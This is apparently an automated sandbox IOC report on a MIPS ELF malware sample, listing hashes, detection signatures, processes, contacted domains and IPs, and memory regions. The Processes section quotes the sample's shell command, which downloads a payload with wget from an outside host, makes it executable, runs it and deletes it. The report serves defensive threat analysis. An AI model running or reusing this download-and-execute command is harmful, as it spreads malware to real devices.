Automated Malware Analysis IOC Report for

Files

File Path

Type

Category

Malicious

mips.elf

ELF 32-bit MSB executable, MIPS, MIPS-I version 1 (SYSV), statically linked, not stripped

initial sample

Details

Filetype:	ELF 32-bit MSB executable, MIPS, MIPS-I version 1 (SYSV), statically linked, not stripped
Entropy:	5.364125367053052
Filename:	mips.elf
Filesize:	171501
MD5:	a798ec8a9b93780aa616fd2ebdf49a62
SHA1:	2a91d8475b8c69bd637d2c5f1e047f66e460039a
SHA256:	34d2a66be0a9357303e75d4577630466515f64948b20baadfbdaf135ba15e39b
SHA512:	da388adcab52197b508c3ddfbb684ce36fb4e67c9c274783e17cb628ba69fb1022207b745051e8983ffddb0dc08ad857168c70483f4984f70575bb4e8976664f
SSDEEP:	3072:o8Bq0NYa+HaT1w2WYsjGERLt+fXm8Hh8d75Nu:PBLMGETKXm8Hh8d75Nu
Preview:	.ELF.....................@.....4..>0.....4. ...(....p........@...@...........................@...@.....p...p...............p.F.p.F.p......qx........dt.Q.................................................F..<...'......!'.......................<...'......!...

Signature Hits	Behavior Group	Mitre Attack
Antivirus / Scanner detection for submitted sample	AV Detection
Malicious sample detected (through community Yara rule)	System Summary
Multi AV Scanner detection for submitted file	AV Detection
Opens /proc/net/* files useful for finding connected devices and routers	Spreading	Remote System Discovery
Executes commands using a shell command-line interpreter	Persistence and Installation Behavior	Scripting
Uses the "uname" system call to query kernel version information (possible evasion)	Malware Analysis System Evasion
Yara signature match	System Summary
May try to detect the virtual machine to hinder analysis (VM artifact strings found in memory)	Malware Analysis System Evasion	Security Software Discovery
Sample and/or dropped files contains symbols with file path information	System Summary

/tmp/qemu-open.8vpvW7 (deleted)

ASCII text

dropped

Details

File:	/tmp/qemu-open.8vpvW7 (deleted)
Category:	dropped
Dump:	qemu-open.8vpvW7 (deleted).12.dr
ID:	dr_0
Target ID:	12
Process:	/tmp/mips.elf
Type:	ASCII text
Entropy:	3.709552666863289
Encrypted:	false
Ssdeep:	6:iekrEcvwAsE5KlwSd4pzKaV6Lpms/a/1VCxGF:ur+m5MwSdIKaV6L1adVRF
Size:	230
Whitelisted:	false
Reputation:	moderate

Processes

Path

Cmdline

Malicious

/tmp/mips.elf

/bin/sh

/bin/sh -c "wget -q http://gay.energy/.../vivid -O .....;chmod 777 .....;./.....;rm -rf ....."

/bin/sh

/usr/bin/wget

wget -q http://gay.energy/.../vivid -O .....

/bin/sh

/usr/bin/chmod

chmod 777 .....

/bin/sh

/bin/sh ./.....

/bin/sh

/usr/bin/rm

rm -rf .....

/tmp/mips.elf

There are 4 hidden processes, click here to show them.

Domains

Name

Malicious

gay.energy

unknown

Details

Name:	gay.energy
TargetID:	-1

Signature Hits	Behavior Group	Mitre Attack
Executes commands using a shell command-line interpreter	Persistence and Installation Behavior	Scripting
Executes the "wget" command typically used for HTTP/S downloading	Networking, Persistence and Installation Behavior	Application Layer Protocol
Performs DNS lookups	Networking	Application Layer Protocol Non-Application Layer Protocol

daisy.ubuntu.com

162.213.35.25

Details

Name:	daisy.ubuntu.com
IP:	162.213.35.25
TargetID:	-1
Active:	true
Reputation:	high

Signature Hits	Behavior Group	Mitre Attack
Performs DNS lookups	Networking	Application Layer Protocol Non-Application Layer Protocol

IPs

Domain

Country

Malicious

92.60.77.69

unknown

Italy

Details

IP:	92.60.77.69
TargetID:	-1
Country:	Italy
Countrycode:	ITA
ASN number:	5602
ASN name:	AS-IRIDEOS-KPIT
Private:	false

Signature Hits	Behavior Group	Mitre Attack
Suricata IDS alerts for network traffic	Networking
Detected TCP or UDP traffic on non-standard ports	Networking	Non-Standard Port
Connects to IPs without corresponding DNS lookups	Networking

Memdumps

Base Address

Regiontype

Protect

Malicious

7fed08421000

page execute read

7fed08421000

page execute read

7fed08421000

page execute read

7fed912a9000

page read and write

560863455000

page read and write

7fed905c7000

page read and write

560860e01000

page read and write

7fed912ee000

page read and write

7fed90c49000

page read and write

7fed88021000

page read and write

560862e20000

page read and write

7fed91178000

page read and write

7fed912a9000

page read and write

7ffca376e000

page execute read

7fed8fdbf000

page read and write

7fed905d5000

page read and write

560860e0b000

page read and write

7fed912a1000

page read and write

560863455000

page read and write

560862e20000

page read and write

7ffca376e000

page execute read

7fed88000000

page read and write

7ffca3742000

page read and write

7fed88000000

page read and write

560860b79000

page execute read

560860b79000

page execute read

560860e0b000

page read and write

7fed08461000

page read and write

7fed08461000

page read and write

7ffca3742000

page read and write

7fed905c7000

page read and write

560860e0b000

page read and write

7fed08469000

page read and write

7fed90c26000

page read and write

7fed912ee000

page read and write

7fed88021000

page read and write

7fed91178000

page read and write

7fed90f97000

page read and write

7fed90885000

page read and write

560862e20000

page read and write

7fed905c7000

page read and write

7fed08461000

page read and write

7fed912ee000

page read and write

7fed912a1000

page read and write

7fed90c66000

page read and write

7fed88021000

page read and write

7fed90c26000

page read and write

7ffca3742000

page read and write

7fed912a9000

page read and write

7ffca376e000

page execute read

7fed88000000

page read and write

7fed8fdbf000

page read and write

7fed90c49000

page read and write

7fed90f97000

page read and write

7fed90885000

page read and write

560862e09000

page execute and read and write

7fed90c66000

page read and write

560862e09000

page execute and read and write

560862e09000

page execute and read and write

7fed912a1000

page read and write

560860e01000

page read and write

7fed905d5000

page read and write

7fed90c26000

page read and write

7fed8fdbf000

page read and write

560860e01000

page read and write

7fed90c49000

page read and write

7fed90f97000

page read and write

7fed90885000

page read and write

7fed08469000

page read and write

7fed90c66000

page read and write

7fed91178000

page read and write

7fed08469000

page read and write

7fed905d5000

page read and write

560863455000

page read and write

560860b79000

page execute read

There are 65 hidden memdumps, click here to show them.

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

IOC Report
mips.elf

Files

Processes

Domains

IPs

Memdumps

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

IOC Reportmips.elf

Files

Processes

Domains

IPs

Memdumps

IOC Report
mips.elf